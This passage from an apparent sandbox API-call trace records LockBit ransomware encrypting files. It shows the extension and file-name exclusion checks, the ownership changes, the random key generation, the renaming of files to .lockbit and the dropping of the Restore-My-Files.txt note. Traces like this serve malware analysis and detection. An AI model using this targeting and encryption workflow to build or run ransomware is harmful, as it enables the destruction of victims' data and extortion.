lpString2=".png") returned -1 [0088.303] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0088.303] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0088.303] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0088.303] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0088.303] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0088.303] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0088.303] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0088.303] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0088.303] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0088.303] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0088.303] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0088.303] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0088.303] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0088.304] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0088.304] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0088.304] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0088.304] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0088.304] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0088.304] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PreviousMenuButtonIcon.png") returned 1 [0088.304] lstrcmpiW (lpString1="ntldr", lpString2="PreviousMenuButtonIcon.png") returned -1 [0088.304] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PreviousMenuButtonIcon.png") returned -1 [0088.304] lstrcmpiW (lpString1="bootsect.bak", lpString2="PreviousMenuButtonIcon.png") returned -1 [0088.304] lstrcmpiW (lpString1="autorun.inf", lpString2="PreviousMenuButtonIcon.png") returned -1 [0088.304] lstrcmpiW (lpString1="thumbs.db", lpString2="PreviousMenuButtonIcon.png") returned 1 [0088.304] lstrcmpiW (lpString1="iconcache.db", lpString2="PreviousMenuButtonIcon.png") returned -1 [0088.304] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\") returned="" [0088.304] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\PreviousMenuButtonIcon.png") returned=".png" [0088.304] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0088.304] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0088.304] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0088.304] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0088.304] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0088.304] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0088.304] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0088.304] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0088.304] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0088.304] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0088.304] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0088.304] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0088.304] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0088.304] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0088.304] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0088.304] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0088.305] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0088.305] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0088.305] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0088.305] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0088.305] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0088.305] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0088.305] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0088.305] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0088.305] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0088.305] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0088.305] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0088.305] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0088.305] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\PreviousMenuButtonIcon.png.lockbit") returned 86 [0088.305] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\PreviousMenuButtonIcon.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\previousmenubuttonicon.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0088.305] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0088.306] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0088.306] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0088.306] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0088.306] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0088.306] RtlFreeAnsiString (AnsiString="\\") [0088.306] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3b8) returned 0x0 [0088.306] malloc (_Size=0x200) returned 0x77d800 [0088.306] NtQueryInformationToken (in: TokenHandle=0x3b8, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0088.306] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0088.306] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0088.306] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\PreviousMenuButtonIcon.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0088.307] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\PreviousMenuButtonIcon.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0088.307] CloseHandle (hObject=0x3b8) returned 1 [0088.307] free (_Block=0x77d800) [0088.307] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\PreviousMenuButtonIcon.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\previousmenubuttonicon.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b8 [0088.308] CreateIoCompletionPort (FileHandle=0x3b8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0088.308] malloc (_Size=0x40068) returned 0x1ff1e60 [0088.308] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=3819) returned 1 [0088.308] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0088.308] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0088.308] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0088.308] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0088.309] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0088.309] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0088.309] ReadFile (in: hFile=0x3b8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0088.316] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\PreviousMenuButtonIcon.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\PreviousMenuButtonIcon.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0088.316] malloc (_Size=0xc2) returned 0x77d800 [0088.316] NtSetInformationFile (FileHandle=0x3b8, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xc2, FileInformationClass=0xa) returned 0x0 [0088.316] free (_Block=0x77d800) [0088.316] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\PreviousMenuButtonIcon.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports") returned 1 [0088.316] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\Restore-My-Files.txt") returned 72 [0088.316] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0088.316] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71f458ec, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71f458ec, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ff68a0b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc3d, dwReserved0=0x0, dwReserved1=0x0, cFileName="SceneButtonInset_Alpha1.png", cAlternateFileName="")) returned 1 [0088.317] lstrcmpiW (lpString1=".", lpString2="SceneButtonInset_Alpha1.png") returned -1 [0088.317] lstrcmpiW (lpString1="..", lpString2="SceneButtonInset_Alpha1.png") returned -1 [0088.317] PathFindExtensionW (pszPath="SceneButtonInset_Alpha1.png") returned=".png" [0088.317] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0088.317] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0088.317] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0088.317] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0088.317] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0088.317] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0088.317] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0088.317] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0088.317] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0088.317] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0088.317] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0088.317] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0088.317] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0088.317] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0088.317] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0088.317] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0088.317] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0088.317] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0088.317] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0088.317] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0088.317] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0088.317] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0088.317] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0088.318] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0088.401] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0088.402] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0088.402] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0088.402] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0088.402] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0088.402] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0088.402] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0088.402] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0088.402] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0088.402] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0088.402] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0088.402] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0088.402] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0088.402] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0088.402] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0088.402] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0088.402] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0088.402] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0088.402] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0088.402] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0088.406] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0088.406] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0088.406] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0088.406] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SceneButtonInset_Alpha1.png") returned -1 [0088.406] lstrcmpiW (lpString1="ntldr", lpString2="SceneButtonInset_Alpha1.png") returned -1 [0088.407] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SceneButtonInset_Alpha1.png") returned -1 [0088.407] lstrcmpiW (lpString1="bootsect.bak", lpString2="SceneButtonInset_Alpha1.png") returned -1 [0088.407] lstrcmpiW (lpString1="autorun.inf", lpString2="SceneButtonInset_Alpha1.png") returned -1 [0088.408] lstrcmpiW (lpString1="thumbs.db", lpString2="SceneButtonInset_Alpha1.png") returned 1 [0088.408] lstrcmpiW (lpString1="iconcache.db", lpString2="SceneButtonInset_Alpha1.png") returned -1 [0088.408] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\") returned="" [0088.409] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonInset_Alpha1.png") returned=".png" [0088.409] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0088.409] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0088.409] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0088.409] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0088.409] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0088.409] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0088.409] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0088.411] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0088.411] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0088.411] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0088.423] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0088.423] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0088.423] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0088.423] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0088.426] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0088.426] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0088.426] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0088.426] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0088.426] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0088.426] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0088.426] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0088.427] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0088.427] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0088.427] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0088.428] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0088.428] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0088.428] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0088.428] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0088.428] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonInset_Alpha1.png.lockbit") returned 87 [0088.428] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonInset_Alpha1.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\scenebuttoninset_alpha1.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0088.437] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0088.438] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0088.438] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0088.439] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0088.439] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0088.439] RtlFreeAnsiString (AnsiString="\\") [0088.440] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3ac) returned 0x0 [0088.440] malloc (_Size=0x200) returned 0x77d800 [0088.440] NtQueryInformationToken (in: TokenHandle=0x3ac, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0088.440] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0088.440] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0088.440] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonInset_Alpha1.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0088.449] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonInset_Alpha1.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0088.450] CloseHandle (hObject=0x3ac) returned 1 [0088.450] free (_Block=0x77d800) [0088.450] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonInset_Alpha1.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\scenebuttoninset_alpha1.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3ac [0088.451] CreateIoCompletionPort (FileHandle=0x3ac, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0088.451] malloc (_Size=0x40068) returned 0x1fb18c0 [0088.453] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=3133) returned 1 [0088.453] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0088.458] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0088.458] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0088.458] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0088.459] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0088.460] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0088.460] ReadFile (in: hFile=0x3ac, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0088.471] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonInset_Alpha1.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonInset_Alpha1.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0088.472] malloc (_Size=0xc4) returned 0x1ff1e60 [0088.472] NtSetInformationFile (FileHandle=0x3ac, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xc4, FileInformationClass=0xa) returned 0x0 [0088.475] free (_Block=0x1ff1e60) [0088.475] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonInset_Alpha1.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports") returned 1 [0088.475] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\Restore-My-Files.txt") returned 72 [0088.475] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0088.475] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71f6ba49, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71f6ba49, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ff68a0b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xdbe, dwReserved0=0x0, dwReserved1=0x0, cFileName="SceneButtonInset_Alpha2.png", cAlternateFileName="")) returned 1 [0088.475] lstrcmpiW (lpString1=".", lpString2="SceneButtonInset_Alpha2.png") returned -1 [0088.475] lstrcmpiW (lpString1="..", lpString2="SceneButtonInset_Alpha2.png") returned -1 [0088.475] PathFindExtensionW (pszPath="SceneButtonInset_Alpha2.png") returned=".png" [0088.475] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0088.475] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0088.475] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0088.475] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0088.476] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0088.476] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0088.476] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0088.476] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0088.476] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0088.476] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0088.476] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0088.476] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0088.476] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0088.476] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0088.476] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0088.476] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0088.476] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0088.476] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0088.476] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0088.476] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0088.476] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0088.476] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0088.476] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0088.476] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0088.476] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0088.476] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0088.476] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0088.476] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0088.476] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0088.476] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0088.476] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0088.476] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0088.476] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0088.477] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0088.477] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0088.477] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0088.477] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0088.477] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0088.477] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0088.477] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0088.477] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0088.477] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0088.477] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0088.477] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0088.477] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0088.477] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0088.477] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0088.477] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SceneButtonInset_Alpha2.png") returned -1 [0088.477] lstrcmpiW (lpString1="ntldr", lpString2="SceneButtonInset_Alpha2.png") returned -1 [0088.477] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SceneButtonInset_Alpha2.png") returned -1 [0088.477] lstrcmpiW 